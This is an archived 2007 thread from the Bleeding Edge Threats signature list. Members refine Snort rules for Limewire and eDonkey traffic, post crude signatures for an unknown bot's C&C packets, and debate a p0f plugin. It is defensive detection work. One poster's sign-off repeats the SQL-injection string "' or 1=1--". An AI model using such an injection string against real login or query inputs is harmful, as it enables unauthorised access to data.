From jonkman at bleedingthreats.net Thu Mar 1 00:29:14 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 00:28:37 2007
Subject: [Bleeding-sigs] Unknown P2P Packets
In-Reply-To: <45E61752.1010900@utc.edu>
References: <45E5ECE5.9000003@bleedingthreats.net> <45E5F382.6090300@utc.edu> <45E5F632.9010502@utc.edu> <20070228232751.GA14906@fuseki.anthill.de> <45E61752.1010900@utc.edu>
Message-ID: <45E61E5A.8060500@bleedingthreats.net>

Excellent! Glad that's identified...

Now, should we consider altering this signature to look for a wider port range? If we could add a depth or offset to nail that down some, the content string is long enough that it shouldn't be a HUGE load addition.

Can I assume that the depth and offset you had in your sig Jeff would apply here and stay reliable?

What expanded range of ports should we consider then? (I'm not limewire-savvy)

Matt

Jeff Kell wrote:
> Markus Lude wrote:
>> Do you have some hits from sid 2001809 too? Sid 2001809 is looking for
>> limewire traffic. Maybe some unusual ports in your traffic? On which
>> ports or port ranges do you see those packets?
>>
>> sid 2001809 rev 3:
>>
>> alert udp $HOME_NET 6346 -> $EXTERNAL_NET 6346:6700 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; content:"|49 50 40 83 53 43 50 41|"; threshold: type threshold, track by_src,count 10, seconds 60; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:3; )
> Ah HAH! They just port jumped!
>
> Thanks Markus. Yes, they had fired some Limewire signatures earlier
> (which results in undesirable "corrective measures" being taken), at
> which point I guess they just changed the default port configurations.
> I didn't examine the existing signature closely enough.
>
> That makes perfect sense now.
>
> Jeff
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

-- 
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------
PGP: http://www.bleedingthreats.com/mattjonkman.asc

From jonkman at bleedingthreats.net Thu Mar 1 00:59:30 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 00:58:18 2007
Subject: [Bleeding-sigs] Unknown P2P Packets
In-Reply-To: <45E61E5A.8060500@bleedingthreats.net>
References: <45E5ECE5.9000003@bleedingthreats.net> <45E5F382.6090300@utc.edu> <45E5F632.9010502@utc.edu> <20070228232751.GA14906@fuseki.anthill.de> <45E61752.1010900@utc.edu> <45E61E5A.8060500@bleedingthreats.net>
Message-ID: <45E62572.8050303@bleedingthreats.net>

I've taken the liberty of making the port ranges like so, and adding depth and offset to the original limewire sig:

alert udp $HOME_NET 1024:65535 -> $EXTERNAL_NET 1024:65535 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; dsize:35; content:"|49 50 40 83 53 43 50 41 00 00|"; offset:25; depth:10; threshold: type both, track by_src, count 1, seconds 360; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:4;)

I think this will be accurate, but I want to make sure it's not going to overload sensors. Just being udp and over 1024 I think it'll be fine.

Please report how it goes

Matt

Matt Jonkman wrote:
> Excellent! Glad that's identified...
>
> Now, should we consider altering this signature to look for a wider port
> range? If we could add a depth or offset to nail that down some, the
> content string is long enough that it shouldn't be a HUGE load addition.
>
> Can I assume that the depth and offset you had in your sig Jeff would
> apply here and stay reliable?
>
> What expanded range of ports should we consider then? (I'm not
> limewire-savvy)
>
> Matt
>
> Jeff Kell wrote:
>> Markus Lude wrote:
>>> Do you have some hits from sid 2001809 too? Sid 2001809 is looking for
>>> limewire traffic. Maybe some unusual ports in your traffic? On which
>>> ports or port ranges do you see those packets?
>>>
>>> sid 2001809 rev 3:
>>>
>>> alert udp $HOME_NET 6346 -> $EXTERNAL_NET 6346:6700 (msg: "BLEEDING-EDGE P2P Limewire P2P UDP Traffic"; content:"|49 50 40 83 53 43 50 41|"; threshold: type threshold, track by_src,count 10, seconds 60; classtype: policy-violation; reference:url,www.limewire.com; sid: 2001809; rev:3; )
>> Ah HAH! They just port jumped!
>>
>> Thanks Markus. Yes, they had fired some Limewire signatures earlier
>> (which results in undesirable "corrective measures" being taken), at
>> which point I guess they just changed the default port configurations.
>> I didn't examine the existing signature closely enough.
>>
>> That makes perfect sense now.
>>
>> Jeff
>

From markus.lude at gmx.de Thu Mar 1 01:40:32 2007
From: markus.lude at gmx.de (Markus Lude)
Date: Thu Mar 1 01:41:01 2007
Subject: [Bleeding-sigs] Edonkey sigs
In-Reply-To: <45E5F8AE.2050105@bleedingthreats.net>
References: <45E5ED95.8020007@auckland.ac.nz> <45E5F8AE.2050105@bleedingthreats.net>
Message-ID: <20070301014032.GA3885@fuseki.anthill.de>

On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote:
> Hey Russell:
>
> Russell Fulton wrote:
> > Hi Folk,
> >
> > For some time (several months) I have been getting loads of FPs from the
> > Edonkey sigs. These seem to be mainly caused by Skype (the new video
> > protocol ?) and sometimes Bit torrent. The current sigs just look at
> > the first two bytes of the packet (IIRC) the first of which is always 0xE3.
> >
>
> I definitely welcome the help. Which ones are falsing for you:
>
> http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup
>
> The ones I did recently, or the older ones?
> >
> > I suspect that the rules can be improved considerably by using flowbits,
> > i.e. changing some of the rules to set flowbits and using other to
> > trigger if the other one is set. I'd be prepared to do some work on
> > this but I will need a good description of the protocol first. I'll
> > google but if anyone has something useful then please let me know.
> >
>
> Unfortunately, it's all UDP. Flowbits won't transfer from one packet to
> another (don't think).
>
> I wrote those mostly from the storm worm traffic, and watching a regular
> edonkey client. I searched a lot and found a couple of papers, one of
> which is referenced in the sigs. There's no official doc out there I was
> able to find.
>
> Frankly, most of the analysis I did in wireshark telling it to process
> the packets as edonkey. Did a good job, things matched up well to what
> it expected, just on new ports and all udp.
>
> I REALLY suspect that skype and some of the game protocols are using
> some edonkey stuff to find peers to talk to, push or pull updates, etc.
> It's a very good way to distribute info among a lot of peers...

The old ones work fine for me, the new ones fire for some of our local gamers (counter strike and maybe others). Most of them could be identified by port 27000 or somewhat slightly above.

> But ya, let's work on these. Maybe by tightening up the dsizes we can
> make them better, but I'm still not convinlse positives'... Not wanted,
> but probably accurate.
>
> Matt

Markus

From shirkdog_list at hotmail.com Thu Mar 1 02:13:21 2007
From: shirkdog_list at hotmail.com (M. Shirk)
Date: Thu Mar 1 02:14:03 2007
Subject: [Bleeding-sigs] Edonkey sigs
In-Reply-To: <20070301014032.GA3885@fuseki.anthill.de>
Message-ID:

Enemy Territory generates false positives on those signatures :-)

Shirkdog
' or 1=1--
http://www.shirkdog.us

>From: Markus Lude
>Reply-To: Bleeding Sigs
>To: Bleeding Sigs
>Subject: Re: [Bleeding-sigs] Edonkey sigs
>Date: Thu, 1 Mar 2007 02:40:32 +0100
>
>On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote:
> > Hey Russell:
> >
> > Russell Fulton wrote:
> > > Hi Folk,
> > >
> > > For some time (several months) I have been getting loads of FPs from the
> > > Edonkey sigs. These seem to be mainly caused by Skype (the new video
> > > protocol ?) and sometimes Bit torrent. The current sigs just look at
> > > the first two bytes of the packet (IIRC) the first of which is always 0xE3.
> > >
> >
> > I definitely welcome the help. Which ones are falsing for you:
> >
> > http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup
> >
> > The ones I did recently, or the older ones?
> > >
> > > I suspect that the rules can be improved considerably by using flowbits,
> > > i.e. changing some of the rules to set flowbits and using other to
> > > trigger if the other one is set. I'd be prepared to do some work on
> > > this but I will need a good description of the protocol first. I'll
> > > google but if anyone has something useful then please let me know.
> > >
> >
> > Unfortunately, it's all UDP. Flowbits won't transfer from one packet to
> > another (don't think).
> >
> > I wrote those mostly from the storm worm traffic, and watching a regular
> > edonkey client. I searched a lot and found a couple of papers, one of
> > which is referenced in the sigs. There's no official doc out there I was
> > able to find.
> >
> > Frankly, most of the analysis I did in wireshark telling it to process
> > the packets as edonkey. Did a good job, things matched up well to what
> > it expected, just on new ports and all udp.
> >
> > I REALLY suspect that skype and some of the game protocols are using
> > some edonkey stuff to find peers to talk to, push or pull updates, etc.
> > It's a very good way to distribute info among a lot of peers...
>
>The old ones work fine for me, the new ones fire for some of our local
>gamers (counter strike and maybe others). Most of them could be
>identified by port 27000 or somewhat slightly above.
>
> > But ya, let's work on these. Maybe by tightening up the dsizes we can
> > make them better, but I'm still not convinlse positives'... Not wanted,
> > but probably accurate.
> >
> > Matt
>
>Markus

From jonkman at bleedingthreats.net Thu Mar 1 06:03:45 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 06:03:51 2007
Subject: [Bleeding-sigs] Unknown Bot
Message-ID: <45E66CC1.2010905@bleedingthreats.net>

New bot out there. Here are crude sigs. Haven't figured out the C&C yet, but this will hit. If you get hits please report them. Need more detail and more variants.

#So far unidentified bot and c&c channel. Working on it. These are crude sigs,
# please let me know if you get hits. Need more information on this one.
#Matt Jonkman
alert tcp $HOME_NET any -> $EXTERNAL_NET 1024:65535 (msg:"BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet"; flow:established,to_server; dsize:48; content:"|3f 33 7a f8 b5 df 0e 28 cb 58 5d b5 0d c3 ef ce 1f 72 4a 60 d3 6f 92 7b 42 8f|"; classtype:unknown; reference:url,doc.bleedingthreats.net/2003460; sid:2003460; rev:1;)
alert tcp $EXTERNAL_NET 1024:65535 -> $HOME_NET any (msg:"BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet"; flow:established,to_server; dsize:48; content:"|ce 01 36 f6 88 7b 94 0d c5 f9 10 bf a4 e5 05 de fd ba cd 4f b9 91 db 10 5e 6f|"; classtype:unknown; reference:url,doc.bleedingthreats.net/2003460; sid:2003461; rev:1;)

From jonkman at bleedingthreats.net Thu Mar 1 13:53:37 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 13:52:03 2007
Subject: [Bleeding-sigs] P0F in Snort - Available for download
In-Reply-To: <20070227205558.ivpdix8c8aogoowc@192.168.168.10>
References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10>
Message-ID: <45E6DAE1.5080007@bleedingthreats.net>

Thanks for posting that Jack.

Anyone take a minute to check it out? What are your thoughts?

Matt

Jack Pepper wrote:
>
> Available for download at
> http://www.autoshun.org/files/Snort-P0f-plugin.tgz
>
> Give it a shot, lemme know how it works for you.
>
> jp
>
>> Quoting Matt Jonkman :
>>
>>> Stray thought: Anyone ever seen or thought about integrating p0f into
>>> snort? P0f is an OS detection tool that's uncannily accurate by tcp
>>> behavior, totally passive.
>
>>
>> How many BT readers out there have p0f already running on their snort
>> box?
>> I decided to make as few changes as possible to the p0f code.
>> Since p0f uses a unix socket file only, p0f needs to run on the same
>> machine as the IDS. It really works out better that way IMO, since the
>> promiscuous port is already open on the snort connection.
>>
>> It does require a patch to the p0f code to fix-up some wild-card
>> processing, So if you can't recompile p0f from source you are not a
>> candidate.
>>
>> It does require snort to be recompiled from source, So if you can't
>> recompile snort from source you are not a candidate.
>>
>> I have only tested it with snort 2.6.1.2 . Other testers are invited,
>> please forward findings to me directly, rather than through the BT
>> list, so we don't junk up the list.
>>
>
> -------------------------------------------------
> Email solutions, MS Exchange alternatives and extrication,
> security services, systems integration.
> Contact: services@doctorunix.com
>

From jonkman at bleedingthreats.net Thu Mar 1 14:18:35 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 14:18:03 2007
Subject: [Bleeding-sigs] Edonkey sigs
In-Reply-To:
References:
Message-ID: <45E6E0BB.5020805@bleedingthreats.net>

You're not supposed to be doing that at work you know.... :)

Seriously though, do you happen to have any packet data around from a false? Again, I really suspect these are real edonkey packets in use by those games. But want to find out for sure.

Matt

M. Shirk wrote:
> Enemy Territory generates false positives on those signatures :-)
>
> Shirkdog
> ' or 1=1--
> http://www.shirkdog.us
>
>> From: Markus Lude
>> Reply-To: Bleeding Sigs
>> To: Bleeding Sigs
>> Subject: Re: [Bleeding-sigs] Edonkey sigs
>> Date: Thu, 1 Mar 2007 02:40:32 +0100
>>
>> On Wed, Feb 28, 2007 at 04:48:30PM -0500, Matt Jonkman wrote:
>> > Hey Russell:
>> >
>> > Russell Fulton wrote:
>> > > Hi Folk,
>> > >
>> > > For some time (several months) I have been getting loads of FPs from the
>> > > Edonkey sigs. These seem to be mainly caused by Skype (the new video
>> > > protocol ?) and sometimes Bit torrent. The current sigs just look at
>> > > the first two bytes of the packet (IIRC) the first of which is always 0xE3.
>> > >
>> >
>> > I definitely welcome the help. Which ones are falsing for you:
>> >
>> > http://www.bleedingthreats.net/cgi-bin/viewcvs.cgi/sigs/P2P/P2P_Edonkey_Traffic?view=markup
>> >
>> > The ones I did recently, or the older ones?
>> > >
>> > > I suspect that the rules can be improved considerably by using flowbits,
>> > > i.e. changing some of the rules to set flowbits and using other to
>> > > trigger if the other one is set. I'd be prepared to do some work on
>> > > this but I will need a good description of the protocol first. I'll
>> > > google but if anyone has something useful then please let me know.
>> > >
>> >
>> > Unfortunately, it's all UDP. Flowbits won't transfer from one packet to
>> > another (don't think).
>> >
>> > I wrote those mostly from the storm worm traffic, and watching a regular
>> > edonkey client. I searched a lot and found a couple of papers, one of
>> > which is referenced in the sigs. There's no official doc out there I was
>> > able to find.
>> >
>> > Frankly, most of the analysis I did in wireshark telling it to process
>> > the packets as edonkey. Did a good job, things matched up well to what
>> > it expected, just on new ports and all udp.
>> >
>> > I REALLY suspect that skype and some of the game protocols are using
>> > some edonkey stuff to find peers to talk to, push or pull updates, etc.
>> > It's a very good way to distribute info among a lot of peers...
>>
>> The old ones work fine for me, the new ones fire for some of our local
>> gamers (counter strike and maybe others). Most of them could be
>> identified by port 27000 or somewhat slightly above.
>>
>> > But ya, let's work on these. Maybe by tightening up the dsizes we can
>> > make them better, but I'm still not convinlse positives'... Not wanted,
>> > but probably accurate.
>> >
>> > Matt
>>
>> Markus
>

From security at brvenik.com Thu Mar 1 15:59:51 2007
From: security at brvenik.com (Jason)
Date: Thu Mar 1 16:01:03 2007
Subject: [Bleeding-sigs] P0F in Snort - Available for download
In-Reply-To: <45E6DAE1.5080007@bleedingthreats.net>
References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net>
Message-ID: <45E6F877.7080507@brvenik.com>
I'm trying to understand the benefit over existing works. Admittedly I've not had a chance to dig into both but it seems that Snort!(fp) can already do this without the dependencies.

http://mysite.verizon.net/sdreed/

Matt Jonkman wrote:
> Thanks for posting that Jack.
>
> Anyone take a minute to check it out? What are your thoughts?
>
> Matt
>
> Jack Pepper wrote:
>>
>> Available for download at
>> http://www.autoshun.org/files/Snort-P0f-plugin.tgz
>>
>> Give it a shot, lemme know how it works for you.
>>
>> jp
>>
>>> Quoting Matt Jonkman :
>>>
>>>> Stray thought: Anyone ever seen or thought about integrating p0f into
>>>> snort? P0f is an OS detection tool that's uncannily accurate by tcp
>>>> behavior, totally passive.
>>> How many BT readers out there have p0f already running on their snort
>>> box? I decided to make as few changes as possible to the p0f code.
>>> Since p0f uses a unix socket file only, p0f needs to run on the same
>>> machine as the IDS. It really works out better that way IMO, since the
>>> promiscuous port is already open on the snort connection.
>>>
>>> It does require a patch to the p0f code to fix-up some wild-card
>>> processing, So if you can't recompile p0f from source you are not a
>>> candidate.
>>>
>>> It does require snort to be recompiled from source, So if you can't
>>> recompile snort from source you are not a candidate.
>>>
>>> I have only tested it with snort 2.6.1.2 . Other testers are invited,
>>> please forward findings to me directly, rather than through the BT
>>> list, so we don't junk up the list.
>>>
>>
>> -------------------------------------------------
>> Email solutions, MS Exchange alternatives and extrication,
>> security services, systems integration.
>> Contact: services@doctorunix.com
>>
>

From pepperjack at doctorunix.com Thu Mar 1 16:35:51 2007
From: pepperjack at doctorunix.com (Jack Pepper)
Date: Thu Mar 1 16:37:04 2007
Subject: [Bleeding-sigs] P0F in Snort - Available for download
In-Reply-To: <45E6F877.7080507@brvenik.com>
References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net> <45E6F877.7080507@brvenik.com>
Message-ID: <20070301103551.byamkm099ck44w0c@mail.doctorunix.com>

Quoting Jason :

> I'm trying to understand the benefit over existing works. Admittedly
> I've not had a chance to dig into both but it seems that Snort!(fp) can
> already do this without the dependencies.
>
> http://mysite.verizon.net/sdreed/
>

I honestly did not know about snort!(fp). I must say (at the risk of being flamed to death) that I think the Snort!(fp) approach is way too complex and problematic. What he has done is *duplicate* the functions of p0f inside of Snort, rather than *use p0f as a utility*. When MZ @ p0f makes a new version or stunning revelation of passive fingerprinting, the Snort!(fp) process will need to be completely reinvented.

I suspect people should do what works for them. I certainly do not intend to supplant snort!(fp), I just didn't know about it.

jp

-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication,
security services, systems integration.
Contact: services@doctorunix.com

From jonkman at bleedingthreats.net Thu Mar 1 16:51:27 2007
From: jonkman at bleedingthreats.net (Matt Jonkman)
Date: Thu Mar 1 16:49:58 2007
Subject: [Bleeding-sigs] P0F in Snort - Available for download
In-Reply-To: <45E6F877.7080507@brvenik.com>
References: <45BBDA18.9030309@bleedingthreats.net> <20070226072944.8x4g4et7fns4ksco@192.168.168.10> <20070227205558.ivpdix8c8aogoowc@192.168.168.10> <45E6DAE1.5080007@bleedingthreats.net> <45E6F877.7080507@brvenik.com>
Message-ID: <45E7048F.8090009@bleedingthreats.net>

Wasn't aware that existed. Cool! It's not up to date though. Have you been using it? If so, is it quick?

Matt

Jason wrote:
> I'm trying to understand the benefit over existing works. Admittedly
> I've not had a chance to dig into both but it seems that Snort!(fp) can
> already do this without the dependencies.
>
> http://mysite.verizon.net/sdreed/
>
> Matt Jonkman wrote:
>> Thanks for posting that Jack.
>>
>> Anyone take a minute to check it out? What are your thoughts?
>>
>> Matt
>>
>> Jack Pepper wrote:
>>> Available for download at
>>> http://www.autoshun.org/files/Snort-P0f-plugin.tgz
>>>
>>> Give it a shot, lemme know how it works for you.
>>>
>>> jp
>>>
>>>> Quoting Matt Jonkman :
>>>>
>>>>> Stray thought: Anyone ever seen or thought about integrating p0f into
>>>>> snort? P0f is an OS detection tool that's uncannily accurate by tcp
>>>>> behavior, totally passive.
>>>> How many BT readers out there have p0f already running on their snort
>>>> box? I decided to make as few changes as possible to the p0f code.
>>>> Since p0f uses a unix socket file only, p0f needs to run on the same
>>>> machine as the IDS. It really works out better that way IMO, since the
>>>> promiscuous port is already open on the snort connection.
>>>>
>>>> It does require a patch to the p0f code to fix-up some wild-card
>>>> processing, So if you can't recompile p0f from source you are not a
>>>> candidate.
>>>>
>>>> It does require snort to be recompiled from source, So if you can't
>>>> recompile snort from source you are not a candidate.
>>>>
>>>> I have only tested it with snort 2.6.1.2 . Other testers are invited,
>>>> please forward findings to me directly, rather than through the BT
>>>> list, so we don't junk up the list.
>>>>
>>> -------------------------------------------------
>>> Email solutions, MS Exchange alternatives and extrication,
>>> security services, systems integration.
>>> Contact: services@doctorunix.com
>>>
>

From bleeding at bleedingthreats.net Thu Mar 1 18:00:08 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Thu Mar 1 18:00:28 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20070301180008.6092922C0B2@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Thu Mar 1 18:00:08 2007 [***]

[+++] Added rules: [+++]

    2003460 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet (bleeding.rules)
    2003461 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet (bleeding.rules)
    2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)

[///] Modified active rules: [///]

    2001809 - BLEEDING-EDGE P2P Limewire P2P UDP Traffic (bleeding-p2p.rules)
    2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules)
    2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules)
    2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules)
    2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules)
    2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules)
    2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules)
    2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules)
    2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules)
    2404006 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 7) (bleeding-botcc.rules)
    2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)
    2405006 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules)

[+++] Added non-rule lines: [+++]

    -> Added to bleeding-drop-BLOCK.rules (1):
        # VERSION 109

    -> Added to bleeding-drop.rules (1):
        # VERSION 109

    -> Added to bleeding-p2p.rules (1):
        #Depth and offset added by Jeff Kell

    -> Added to bleeding-sid-msg.map (10):
        2003460 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet || url,doc.bleedingthreats.net/2003460
        2003461 || BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet || url,doc.bleedingthreats.net/2003460
        2400001 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2400002 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2400003 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2400004 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso
        2401001 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso
        2401002 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso
        2401003 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso
        2401004 || BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso

    -> Added to bleeding.rules (3):
        #So far unidentified bot and c&c channel. Working on it. These are crude sigs,
        # please let me know if you get hits. Need more information on this one.
        #Matt Jonkman

[---] Removed non-rule lines: [---]

    -> Removed from bleeding-drop-BLOCK.rules (1):
        # VERSION 108

    -> Removed from bleeding-drop.rules (1):
        # VERSION 108

From bleeding at bleedingthreats.net Fri Mar 2 15:00:05 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Fri Mar 2 15:00:16 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Weekly Signature Changes
Message-ID: <20070302150005.A5DA322C088@sb03.us.bleedingsnort.com>

[***] Results from Oinkmaster started Fri Mar 2 15:00:05 2007 [***]

[+++] Added rules: [+++]

    2003436 - BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller 2 (bleeding-virus.rules)
    2003437 - BLEEDING-EDGE P2P Ares over UDP (bleeding-p2p.rules)
    2003438 - BLEEDING-EDGE MALWARE Abcsearch.com Spyware Reporting (bleeding-malware.rules)
    2003439 - BLEEDING-EDGE MALWARE Dropspam.com Spyware Install User-Agent (DSInstall) (bleeding-malware.rules)
    2003440 - BLEEDING-EDGE MALWARE Dropspam.com Spyware Reporting (bleeding-malware.rules)
    2003441 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent (wbi_v0.90) (bleeding-malware.rules)
    2003442 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Installing (bleeding-malware.rules)
    2003444 - BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install Code Download (bleeding-malware.rules)
    2003445 - BLEEDING-EDGE MALWARE Deskwizz.com Spyware Install INI Download (bleeding-malware.rules)
    2003446 - BLEEDING-EDGE MALWARE Adware Command Client Checkin (bleeding-malware.rules)
    2003447 - BLEEDING-EDGE MALWARE Humanclick.com Client Checkin (bleeding-malware.rules)
    2003448 - BLEEDING-EDGE MALWARE Humanclick.com Client Update (bleeding-malware.rules)
    2003449 - BLEEDING-EDGE MALWARE Webbuying.net Spyware Install User-Agent 2 (wb v1.6.4) (bleeding-malware.rules)
    2003450 - BLEEDING-EDGE MALWARE Specificclick.net Spyware Activity (bleeding-malware.rules)
    2003451 - BLEEDING-EDGE MALWARE K8l.info Spyware Activity (bleeding-malware.rules)
    2003452 - BLEEDING-EDGE MALWARE LoopAd/Secure-browser.com Spyware User-Agent (rw.exe) (bleeding-malware.rules)
    2003453 - BLEEDING-EDGE POLICY Netvacy.com Anonymizing Proxy Access (bleeding-policy.rules)
    2003454 - BLEEDING-EDGE POLICY Yahoo 360 Social Site Access (bleeding-policy.rules)
    2003455 - BLEEDING-EDGE POLICY Hi5.com Social Site Access (bleeding-policy.rules)
    2003456 - BLEEDING-EDGE POLICY Gazzag.com Social Site Access (bleeding-policy.rules)
    2003457 - BLEEDING-EDGE POLICY Metacafe.com Social Site Access (bleeding-policy.rules)
    2003458 - BLEEDING-EDGE POLICY Orkut.com Social Site Access (bleeding-policy.rules)
    2003460 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Outbound C&C Packet (bleeding.rules)
    2003461 - BLEEDING-EDGE CURRENT EVENTS Unknown Bot Inbound C&C Packet (bleeding.rules)

[///] Modified active rules: [///]

    2001809 - BLEEDING-EDGE P2P Limewire P2P UDP Traffic (bleeding-p2p.rules)
    2002839 - BLEEDING-EDGE Malware My Search Spyware Config Download (bleeding-malware.rules)
    2003392 - BLEEDING-EDGE TROJAN Warezov/Stration Communicating with Controller (bleeding-virus.rules)
    2003428 - BLEEDING-EDGE MALWARE Surfaccuracy.com Spyware Install User-Agent (SF Installer) (bleeding-malware.rules)
    2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules)
    2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
    2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules)
